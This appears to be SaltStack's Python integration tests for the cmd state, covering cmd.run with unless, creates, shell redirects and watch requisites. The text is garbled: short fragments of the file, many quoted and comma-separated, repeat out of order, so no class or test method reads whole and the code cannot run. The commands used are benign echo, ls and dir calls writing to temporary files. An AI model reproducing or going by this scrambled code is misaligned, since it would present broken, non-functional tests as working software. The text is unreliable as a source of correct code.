self.assertEqual(len(ret[state_key]['changes']), 4) def test_run_redirect(self): ''' test cmd.run with shell", "cmd.run: - unless: echo cheese > {1} '''.format(self.test_tmp_path, self.test_file))) ret", "test=True) self.assertSaltNoneReturn(ret) class CMDRunRedirectTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state", "the sls files in the test itself, # And some", "salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' {0}: cmd.run: - unless: echo", "!= errno.EBADF: raise exc super(CMDRunRedirectTest, self).setUp() def tearDown(self): for path", "__future__ import absolute_import import errno import os import textwrap import", "test_run_creates_new(self): ''' test cmd.run creates not there ''' os.remove(self.test_file) state_key", "= self.run_state('cmd.run', name='ls', cwd=tempfile.gettempdir(), test=True) self.assertSaltNoneReturn(ret) class CMDRunRedirectTest(ModuleCase, SaltReturnAssertsMixin): '''", "'.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename) # Create the testfile and", "watch: - cmd: saltines ''')) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[saltines_key]['result'])", "= 'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as", "exc super(CMDRunRedirectTest, self).setUp() def tearDown(self): for path in (self.state_file, self.test_tmp_path,", "def test_run_unless(self): ''' test cmd.run unless ''' state_key = 'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path)", "the comment reads that the # command \"echo \"hello\"\" was", "CMDTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state ''' def test_run_simple(self):", "# As some of the tests create the sls files", "def test_test_run_simple(self): ''' cmd.run test interface ''' ret = self.run_state('cmd.run',", "'''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 4) def test_run_redirect(self):", "self.test_file = tempfile.mkstemp() try: os.close(fd) except OSError as exc: if", "self.test_tmp_path = tempfile.mkstemp() try: os.close(fd) except OSError as exc: if", "regression testing for. self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo \"hello\"_|-run']['comment'], 'Command \"echo \"hello\"\" run') def", "will pass, but the second will fail. This tests the", "test cmd.run with shell redirect ''' state_key = 'cmd_|-echo test", "> {0}: cmd.run '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) class", "the last unless # command in the state. If the", "# Import salt libs import salt.utils IS_WINDOWS = salt.utils.is_windows() class", "'cmd_|-saltines_|-echo changed=true_|-run' biscuits_key = 'cmd_|-biscuits_|-echo biscuits_|-wait' with salt.utils.fopen(self.state_file, 'w') as", "test_run_redirect(self): ''' test cmd.run with shell redirect ''' state_key =", "# Create the testfile and release the handle fd, self.test_file", "= 'dir' if IS_WINDOWS else 'ls' ret = self.run_state('cmd.run', name=cmd,", "import TMP_STATE_TREE from tests.support.mixins import SaltReturnAssertsMixin # Import salt libs", "super(CMDRunRedirectTest, self).setUp() def tearDown(self): for path in (self.state_file, self.test_tmp_path, self.test_file):", "= 'run_watch' state_filename = self.state_name + '.sls' self.state_file = os.path.join(TMP_STATE_TREE,", "cmd state of run_watch ''' def setUp(self): self.state_name = 'run_watch'", "def test_run_simple(self): ''' cmd.run ''' cmd = 'dir' if IS_WINDOWS", "with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' saltines: cmd.run: - name:", "# command in the state. If the comment reads \"unless", "''' def setUp(self): self.state_name = 'run_watch' state_filename = self.state_name +", "self.run_state('cmd.run', name=cmd, cwd=tempfile.gettempdir()) self.assertSaltTrueReturn(ret) def test_test_run_simple(self): ''' cmd.run test interface", "OSError as exc: if exc.errno != errno.EBADF: raise exc #", "self.state_name + '.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename) # Create the", "as fb_: fb_.write(textwrap.dedent(''' saltines: cmd.run: - name: echo changed=true -", "''' cmd = 'dir' if IS_WINDOWS else 'ls' ret =", "command succeeded, # which is the bug we're regression testing", "the fix for issue #35384. (The fix is in PR", "self.state_name = 'run_watch' state_filename = self.state_name + '.sls' self.state_file =", "the state. If the comment reads \"unless execution succeeded\", or", "similar, # then the unless state run bailed out after", "first unless command succeeded, # which is the bug we're", "release the handle fd, self.test_file = tempfile.mkstemp() try: os.close(fd) except", "tearDown(self): os.remove(self.state_file) super(CMDRunWatchTest, self).tearDown() def test_run_watch(self): ''' test cmd.run watch", "SaltReturnAssertsMixin): ''' Validate the cmd state ''' def test_run_simple(self): '''", "from tests.support.paths import TMP_STATE_TREE from tests.support.mixins import SaltReturnAssertsMixin # Import", "/ - stateful: True biscuits: cmd.wait: - name: echo biscuits", "''' def test_run_simple(self): ''' cmd.run ''' cmd = 'dir' if", "state_key = 'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w')", "we want to remove # As some of the tests", "want to remove # As some of the tests create", "out after the first unless command succeeded, # which is", "self.state_name = 'run_redirect' state_filename = self.state_name + '.sls' self.state_file =", "echo changed=true - cwd: / - stateful: True biscuits: cmd.wait:", "IS_WINDOWS else 'ls' ret = self.run_state('cmd.run', name=cmd, cwd=tempfile.gettempdir()) self.assertSaltTrueReturn(ret) def", "try: os.remove(path) except OSError: # Not all of the tests", "test interface ''' ret = self.run_state('cmd.run', name='ls', cwd=tempfile.gettempdir(), test=True) self.assertSaltNoneReturn(ret)", "file state tree. pass super(CMDRunRedirectTest, self).tearDown() def test_run_unless(self): ''' test", "watch ''' saltines_key = 'cmd_|-saltines_|-echo changed=true_|-run' biscuits_key = 'cmd_|-biscuits_|-echo biscuits_|-wait'", "{0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' echo test >", "[self.state_name]) self.assertTrue(ret[state_key]['result']) def test_run_unless_multiple_cmds(self): ''' test cmd.run using multiple unless", "> {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' echo test", "''' state_key = 'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent('''", "cmd state ''' def test_run_simple(self): ''' cmd.run ''' cmd =", "IS_WINDOWS = salt.utils.is_windows() class CMDTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd", "testfile and release the handle fd, self.test_file = tempfile.mkstemp() try:", "succeeded, # which is the bug we're regression testing for.", "''' Validate the cmd state of run_redirect ''' def setUp(self):", "state ''' # Import python libs from __future__ import absolute_import", "#35384. (The fix is in PR #35545.) ''' sls =", "os import textwrap import tempfile # Import Salt Testing libs", "''' Validate the cmd state of run_watch ''' def setUp(self):", "(self.state_file, self.test_tmp_path, self.test_file): try: os.remove(path) except OSError: # Not all", "raise exc super(CMDRunRedirectTest, self).setUp() def tearDown(self): for path in (self.state_file,", "run_redirect ''' def setUp(self): self.state_name = 'run_redirect' state_filename = self.state_name", "Create the testfile and release the handle fd, self.test_file =", "sls = self.run_function('state.sls', mods='issue-35384') self.assertSaltTrueReturn(sls) # We must assert against", "import tempfile # Import Salt Testing libs from tests.support.case import", "= 'cmd_|-echo test > {0}_|-echo test > {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file,", "self.assertEqual(len(ret[state_key]['changes']), 4) def test_run_redirect(self): ''' test cmd.run with shell redirect", "-*- ''' Tests for the file state ''' # Import", "testing for. self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo \"hello\"_|-run']['comment'], 'Command \"echo \"hello\"\" run') def test_run_creates_exists(self):", "= self.run_state('cmd.run', name=cmd, cwd=tempfile.gettempdir()) self.assertSaltTrueReturn(ret) def test_test_run_simple(self): ''' cmd.run test", "[self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 0) def test_run_creates_new(self): ''' test cmd.run creates", "is the bug we're regression testing for. self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo \"hello\"_|-run']['comment'], 'Command", "'w') as fb_: fb_.write(textwrap.dedent(''' echo test > {0}: cmd.run '''.format(self.test_file)))", "where the first cmd in the list will pass, but", "in the list will pass, but the second will fail.", "salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' echo test > {0}: cmd.run", "[self.state_name]) self.assertTrue(ret[state_key]['result']) class CMDRunWatchTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state", "as exc: if exc.errno != errno.EBADF: raise exc super(CMDRunRedirectTest, self).setUp()", "last unless # command in the state. If the comment", "after the first unless command succeeded, # which is the", "the comment reads \"unless execution succeeded\", or similar, # then", "cwd: / - watch: - cmd: saltines ''')) ret =", "Validate the cmd state of run_watch ''' def setUp(self): self.state_name", "ret = self.run_state('cmd.run', name='ls', cwd=tempfile.gettempdir(), test=True) self.assertSaltNoneReturn(ret) class CMDRunRedirectTest(ModuleCase, SaltReturnAssertsMixin):", "# Import python libs from __future__ import absolute_import import errno", "self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 0) def test_run_creates_new(self): ''' test cmd.run creates not", "in the test itself, # And some are using files", "the test itself, # And some are using files in", "then the unless state run bailed out after the first", "Testing libs from tests.support.case import ModuleCase from tests.support.paths import TMP_STATE_TREE", "run_watch ''' def setUp(self): self.state_name = 'run_watch' state_filename = self.state_name", "'cmd_|-biscuits_|-echo biscuits_|-wait' with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' saltines: cmd.run:", "def test_run_watch(self): ''' test cmd.run watch ''' saltines_key = 'cmd_|-saltines_|-echo", "cmd.run test interface ''' ret = self.run_state('cmd.run', name='ls', cwd=tempfile.gettempdir(), test=True)", "the cmd state ''' def test_run_simple(self): ''' cmd.run ''' cmd", "test_run_unless_multiple_cmds(self): ''' test cmd.run using multiple unless options where the", "to the last unless # command in the state. If", "as fb_: fb_.write(textwrap.dedent(''' echo >> {0}: cmd.run: - creates: {0}", "echo test > {0}: cmd.run '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name])", "the cmd state of run_redirect ''' def setUp(self): self.state_name =", "ret = self.run_state('cmd.run', name=cmd, cwd=tempfile.gettempdir()) self.assertSaltTrueReturn(ret) def test_test_run_simple(self): ''' cmd.run", "if exc.errno != errno.EBADF: raise exc # Create the testfile", "salt.utils IS_WINDOWS = salt.utils.is_windows() class CMDTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the", "'''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) class CMDRunWatchTest(ModuleCase, SaltReturnAssertsMixin): '''", "self).setUp() def tearDown(self): os.remove(self.state_file) super(CMDRunWatchTest, self).tearDown() def test_run_watch(self): ''' test", "'w') as fb_: fb_.write(textwrap.dedent(''' echo >> {0}: cmd.run: - creates:", "the bug we're regression testing for. self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo \"hello\"_|-run']['comment'], 'Command \"echo", "testfile and release the handle fd, self.test_tmp_path = tempfile.mkstemp() try:", "salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' saltines: cmd.run: - name: echo", "cmd.run creates already there ''' state_key = 'cmd_|-echo >> {0}_|-echo", "''' cmd.run test interface ''' ret = self.run_state('cmd.run', name='ls', cwd=tempfile.gettempdir(),", "test_test_run_simple(self): ''' cmd.run test interface ''' ret = self.run_state('cmd.run', name='ls',", "against the comment here to make sure the comment reads", "Import python libs from __future__ import absolute_import import errno import", "CMDRunRedirectTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state of run_redirect '''", "test file state tree. pass super(CMDRunRedirectTest, self).tearDown() def test_run_unless(self): '''", "import absolute_import import errno import os import textwrap import tempfile", "fb_.write(textwrap.dedent(''' saltines: cmd.run: - name: echo changed=true - cwd: /", "cmd in the list will pass, but the second will", "''' test cmd.run unless ''' state_key = 'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path) with salt.utils.fopen(self.state_file,", "for path in (self.state_file, self.test_tmp_path, self.test_file): try: os.remove(path) except OSError:", "as fb_: fb_.write(textwrap.dedent(''' echo test > {0}: cmd.run '''.format(self.test_file))) ret", "run. This ensures that we made it to the last", "are using files in the integration test file state tree.", "cmd.run creates not there ''' os.remove(self.test_file) state_key = 'cmd_|-echo >>", "state tree. pass super(CMDRunRedirectTest, self).tearDown() def test_run_unless(self): ''' test cmd.run", "files in the integration test file state tree. pass super(CMDRunRedirectTest,", "self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) def test_run_unless_multiple_cmds(self): ''' test", "Create the testfile and release the handle fd, self.test_tmp_path =", "errno.EBADF: raise exc super(CMDRunRedirectTest, self).setUp() def tearDown(self): for path in", "super(CMDRunWatchTest, self).tearDown() def test_run_watch(self): ''' test cmd.run watch ''' saltines_key", "- unless: echo cheese > {1} '''.format(self.test_tmp_path, self.test_file))) ret =", "state_filename = self.state_name + '.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename) super(CMDRunWatchTest,", "Tests for the file state ''' # Import python libs", "make sure the comment reads that the # command \"echo", "# We must assert against the comment here to make", "using files in the integration test file state tree. pass", "cmd.run using multiple unless options where the first cmd in", "it to the last unless # command in the state.", "comment reads \"unless execution succeeded\", or similar, # then the", "os.close(fd) except OSError as exc: if exc.errno != errno.EBADF: raise", "test_run_watch(self): ''' test cmd.run watch ''' saltines_key = 'cmd_|-saltines_|-echo changed=true_|-run'", "files in the test itself, # And some are using", "class CMDTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state ''' def", "- creates: {0} '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']),", "the tests leave files around that we want to remove", "Import salt libs import salt.utils IS_WINDOWS = salt.utils.is_windows() class CMDTest(ModuleCase,", "cwd: / - stateful: True biscuits: cmd.wait: - name: echo", "fb_: fb_.write(textwrap.dedent(''' {0}: cmd.run: - unless: echo cheese > {1}", "that we made it to the last unless # command", "cheese > {1} '''.format(self.test_tmp_path, self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result'])", "the tests create the sls files in the test itself,", "list will pass, but the second will fail. This tests", "creates not there ''' os.remove(self.test_file) state_key = 'cmd_|-echo >> {0}_|-echo", "- name: echo changed=true - cwd: / - stateful: True", "here to make sure the comment reads that the #", "tests leave files around that we want to remove #", "name: echo biscuits - cwd: / - watch: - cmd:", "= self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) def test_run_unless_multiple_cmds(self): ''' test cmd.run using", "'Command \"echo \"hello\"\" run') def test_run_creates_exists(self): ''' test cmd.run creates", "{0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' echo >> {0}:", "setUp(self): self.state_name = 'run_redirect' state_filename = self.state_name + '.sls' self.state_file", "self.test_tmp_path, self.test_file): try: os.remove(path) except OSError: # Not all of", "As some of the tests create the sls files in", "= os.path.join(TMP_STATE_TREE, state_filename) # Create the testfile and release the", "Validate the cmd state ''' def test_run_simple(self): ''' cmd.run '''", "the first unless command succeeded, # which is the bug", "state of run_redirect ''' def setUp(self): self.state_name = 'run_redirect' state_filename", "os.remove(path) except OSError: # Not all of the tests leave", "unless state run bailed out after the first unless command", "create the sls files in the test itself, # And", "saltines: cmd.run: - name: echo changed=true - cwd: / -", ">> {0}_|-echo >> {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent('''", "If the comment reads \"unless execution succeeded\", or similar, #", "SaltReturnAssertsMixin): ''' Validate the cmd state of run_watch ''' def", "multiple unless options where the first cmd in the list", "that the # command \"echo \"hello\"\" was run. This ensures", "TMP_STATE_TREE from tests.support.mixins import SaltReturnAssertsMixin # Import salt libs import", "self).tearDown() def test_run_unless(self): ''' test cmd.run unless ''' state_key =", "self).setUp() def tearDown(self): for path in (self.state_file, self.test_tmp_path, self.test_file): try:", "fb_.write(textwrap.dedent(''' echo test > {0}: cmd.run '''.format(self.test_file))) ret = self.run_function('state.sls',", "super(CMDRunWatchTest, self).setUp() def tearDown(self): os.remove(self.state_file) super(CMDRunWatchTest, self).tearDown() def test_run_watch(self): '''", "creates already there ''' state_key = 'cmd_|-echo >> {0}_|-echo >>", "class CMDRunRedirectTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state of run_redirect", "test > {0}_|-echo test > {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as", "self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) class CMDRunWatchTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd", "to remove # As some of the tests create the", "in the integration test file state tree. pass super(CMDRunRedirectTest, self).tearDown()", "assert against the comment here to make sure the comment", "self.assertSaltNoneReturn(ret) class CMDRunRedirectTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state of", "with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' echo test > {0}:", "This ensures that we made it to the last unless", "reads that the # command \"echo \"hello\"\" was run. This", "pass, but the second will fail. This tests the fix", "os.path.join(TMP_STATE_TREE, state_filename) # Create the testfile and release the handle", "''' cmd.run ''' cmd = 'dir' if IS_WINDOWS else 'ls'", "{0} '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 0) def", "exc: if exc.errno != errno.EBADF: raise exc # Create the", "test cmd.run unless ''' state_key = 'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path) with salt.utils.fopen(self.state_file, 'w')", "''' test cmd.run creates not there ''' os.remove(self.test_file) state_key =", "self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 0) def test_run_creates_new(self): ''' test cmd.run", "options where the first cmd in the list will pass,", "bug we're regression testing for. self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo \"hello\"_|-run']['comment'], 'Command \"echo \"hello\"\"", "self.state_name + '.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename) super(CMDRunWatchTest, self).setUp() def", "the cmd state of run_watch ''' def setUp(self): self.state_name =", "all of the tests leave files around that we want", "stateful: True biscuits: cmd.wait: - name: echo biscuits - cwd:", "was run. This ensures that we made it to the", "import salt.utils IS_WINDOWS = salt.utils.is_windows() class CMDTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate", "\"hello\"\" was run. This ensures that we made it to", "''' test cmd.run with shell redirect ''' state_key = 'cmd_|-echo", "exc.errno != errno.EBADF: raise exc super(CMDRunRedirectTest, self).setUp() def tearDown(self): for", "os.path.join(TMP_STATE_TREE, state_filename) super(CMDRunWatchTest, self).setUp() def tearDown(self): os.remove(self.state_file) super(CMDRunWatchTest, self).tearDown() def", "test itself, # And some are using files in the", "issue #35384. (The fix is in PR #35545.) ''' sls", "self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo \"hello\"_|-run']['comment'], 'Command \"echo \"hello\"\" run') def test_run_creates_exists(self): ''' test", "unless options where the first cmd in the list will", ">> {0}: cmd.run: - creates: {0} '''.format(self.test_file))) ret = self.run_function('state.sls',", "interface ''' ret = self.run_state('cmd.run', name='ls', cwd=tempfile.gettempdir(), test=True) self.assertSaltNoneReturn(ret) class", "''' state_key = 'cmd_|-echo test > {0}_|-echo test > {0}_|-run'.format(self.test_file)", "'run_redirect' state_filename = self.state_name + '.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename)", "= self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) class CMDRunWatchTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the", "''' def setUp(self): self.state_name = 'run_redirect' state_filename = self.state_name +", ">> {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' echo >>", "And some are using files in the integration test file", "we're regression testing for. self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo \"hello\"_|-run']['comment'], 'Command \"echo \"hello\"\" run')", "path in (self.state_file, self.test_tmp_path, self.test_file): try: os.remove(path) except OSError: #", "'dir' if IS_WINDOWS else 'ls' ret = self.run_state('cmd.run', name=cmd, cwd=tempfile.gettempdir())", "ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 4) def test_run_redirect(self): '''", "import SaltReturnAssertsMixin # Import salt libs import salt.utils IS_WINDOWS =", "self.run_function('state.sls', mods='issue-35384') self.assertSaltTrueReturn(sls) # We must assert against the comment", "fd, self.test_file = tempfile.mkstemp() try: os.close(fd) except OSError as exc:", "state ''' def test_run_simple(self): ''' cmd.run ''' cmd = 'dir'", "''' os.remove(self.test_file) state_key = 'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file) with", "state_key = 'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' {0}:", "the comment here to make sure the comment reads that", "'''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 0) def test_run_creates_new(self):", "cmd.run: - name: echo changed=true - cwd: / - stateful:", "test > {0}: cmd.run '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result'])", "''' ret = self.run_state('cmd.run', name='ls', cwd=tempfile.gettempdir(), test=True) self.assertSaltNoneReturn(ret) class CMDRunRedirectTest(ModuleCase,", "succeeded\", or similar, # then the unless state run bailed", "unless ''' state_key = 'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path) with salt.utils.fopen(self.state_file, 'w') as fb_:", "fd, self.test_tmp_path = tempfile.mkstemp() try: os.close(fd) except OSError as exc:", "with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' {0}: cmd.run: - unless:", "self.assertSaltTrueReturn(sls) # We must assert against the comment here to", "from tests.support.case import ModuleCase from tests.support.paths import TMP_STATE_TREE from tests.support.mixins", "''' state_key = 'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file,", "Validate the cmd state of run_redirect ''' def setUp(self): self.state_name", "integration test file state tree. pass super(CMDRunRedirectTest, self).tearDown() def test_run_unless(self):", "the second will fail. This tests the fix for issue", "fb_: fb_.write(textwrap.dedent(''' saltines: cmd.run: - name: echo changed=true - cwd:", "ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 0) def test_run_creates_new(self): '''", "test_run_unless(self): ''' test cmd.run unless ''' state_key = 'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path) with", "0) def test_run_creates_new(self): ''' test cmd.run creates not there '''", "# Import Salt Testing libs from tests.support.case import ModuleCase from", "the first cmd in the list will pass, but the", "run') def test_run_creates_exists(self): ''' test cmd.run creates already there '''", "name: echo changed=true - cwd: / - stateful: True biscuits:", "raise exc # Create the testfile and release the handle", "tests.support.paths import TMP_STATE_TREE from tests.support.mixins import SaltReturnAssertsMixin # Import salt", "file state ''' # Import python libs from __future__ import", "not there ''' os.remove(self.test_file) state_key = 'cmd_|-echo >> {0}_|-echo >>", "# Create the testfile and release the handle fd, self.test_tmp_path", "# command \"echo \"hello\"\" was run. This ensures that we", "[self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 4) def test_run_redirect(self): ''' test cmd.run with", "the integration test file state tree. pass super(CMDRunRedirectTest, self).tearDown() def", "fix is in PR #35545.) ''' sls = self.run_function('state.sls', mods='issue-35384')", "for. self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo \"hello\"_|-run']['comment'], 'Command \"echo \"hello\"\" run') def test_run_creates_exists(self): '''", "python libs from __future__ import absolute_import import errno import os", "ModuleCase from tests.support.paths import TMP_STATE_TREE from tests.support.mixins import SaltReturnAssertsMixin #", "self).tearDown() def test_run_watch(self): ''' test cmd.run watch ''' saltines_key =", "libs from tests.support.case import ModuleCase from tests.support.paths import TMP_STATE_TREE from", "!= errno.EBADF: raise exc # Create the testfile and release", "# which is the bug we're regression testing for. self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo", "''' Tests for the file state ''' # Import python", "fb_: fb_.write(textwrap.dedent(''' echo test > {0}: cmd.run '''.format(self.test_file))) ret =", "tempfile # Import Salt Testing libs from tests.support.case import ModuleCase", "if IS_WINDOWS else 'ls' ret = self.run_state('cmd.run', name=cmd, cwd=tempfile.gettempdir()) self.assertSaltTrueReturn(ret)", "coding: utf-8 -*- ''' Tests for the file state '''", "''' saltines_key = 'cmd_|-saltines_|-echo changed=true_|-run' biscuits_key = 'cmd_|-biscuits_|-echo biscuits_|-wait' with", "creates: {0} '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 0)", "execution succeeded\", or similar, # then the unless state run", "but the second will fail. This tests the fix for", "\"hello\"\" run') def test_run_creates_exists(self): ''' test cmd.run creates already there", "'ls' ret = self.run_state('cmd.run', name=cmd, cwd=tempfile.gettempdir()) self.assertSaltTrueReturn(ret) def test_test_run_simple(self): '''", "= self.run_function('state.sls', mods='issue-35384') self.assertSaltTrueReturn(sls) # We must assert against the", "and release the handle fd, self.test_tmp_path = tempfile.mkstemp() try: os.close(fd)", "= self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 0) def test_run_creates_new(self): ''' test", "{1} '''.format(self.test_tmp_path, self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) def test_run_unless_multiple_cmds(self):", "state_key = 'cmd_|-echo test > {0}_|-echo test > {0}_|-run'.format(self.test_file) with", "> {0}_|-echo test > {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as fb_:", "class CMDRunWatchTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state of run_watch", "OSError as exc: if exc.errno != errno.EBADF: raise exc super(CMDRunRedirectTest,", "self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) def test_run_unless_multiple_cmds(self): ''' test cmd.run using multiple", "saltines_key = 'cmd_|-saltines_|-echo changed=true_|-run' biscuits_key = 'cmd_|-biscuits_|-echo biscuits_|-wait' with salt.utils.fopen(self.state_file,", "fb_.write(textwrap.dedent(''' echo >> {0}: cmd.run: - creates: {0} '''.format(self.test_file))) ret", "> {1} '''.format(self.test_tmp_path, self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) def", "salt.utils.is_windows() class CMDTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state '''", "def tearDown(self): for path in (self.state_file, self.test_tmp_path, self.test_file): try: os.remove(path)", "the testfile and release the handle fd, self.test_file = tempfile.mkstemp()", "there ''' state_key = 'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file) with", "handle fd, self.test_file = tempfile.mkstemp() try: os.close(fd) except OSError as", "some of the tests create the sls files in the", "test_run_simple(self): ''' cmd.run ''' cmd = 'dir' if IS_WINDOWS else", "self.assertEqual(len(ret[state_key]['changes']), 0) def test_run_creates_new(self): ''' test cmd.run creates not there", "comment reads that the # command \"echo \"hello\"\" was run.", "'w') as fb_: fb_.write(textwrap.dedent(''' saltines: cmd.run: - name: echo changed=true", "test cmd.run creates not there ''' os.remove(self.test_file) state_key = 'cmd_|-echo", "tests.support.mixins import SaltReturnAssertsMixin # Import salt libs import salt.utils IS_WINDOWS", "cwd=tempfile.gettempdir(), test=True) self.assertSaltNoneReturn(ret) class CMDRunRedirectTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd", "state_filename) super(CMDRunWatchTest, self).setUp() def tearDown(self): os.remove(self.state_file) super(CMDRunWatchTest, self).tearDown() def test_run_watch(self):", "- cwd: / - stateful: True biscuits: cmd.wait: - name:", "shell redirect ''' state_key = 'cmd_|-echo test > {0}_|-echo test", "state. If the comment reads \"unless execution succeeded\", or similar,", "in (self.state_file, self.test_tmp_path, self.test_file): try: os.remove(path) except OSError: # Not", "cmd.run watch ''' saltines_key = 'cmd_|-saltines_|-echo changed=true_|-run' biscuits_key = 'cmd_|-biscuits_|-echo", "as exc: if exc.errno != errno.EBADF: raise exc # Create", "biscuits_key = 'cmd_|-biscuits_|-echo biscuits_|-wait' with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent('''", "self.state_file = os.path.join(TMP_STATE_TREE, state_filename) # Create the testfile and release", "\"echo \"hello\"\" run') def test_run_creates_exists(self): ''' test cmd.run creates already", "command \"echo \"hello\"\" was run. This ensures that we made", "setUp(self): self.state_name = 'run_watch' state_filename = self.state_name + '.sls' self.state_file", "try: os.close(fd) except OSError as exc: if exc.errno != errno.EBADF:", "/ - watch: - cmd: saltines ''')) ret = self.run_function('state.sls',", "echo >> {0}: cmd.run: - creates: {0} '''.format(self.test_file))) ret =", "+ '.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename) super(CMDRunWatchTest, self).setUp() def tearDown(self):", "name=cmd, cwd=tempfile.gettempdir()) self.assertSaltTrueReturn(ret) def test_test_run_simple(self): ''' cmd.run test interface '''", 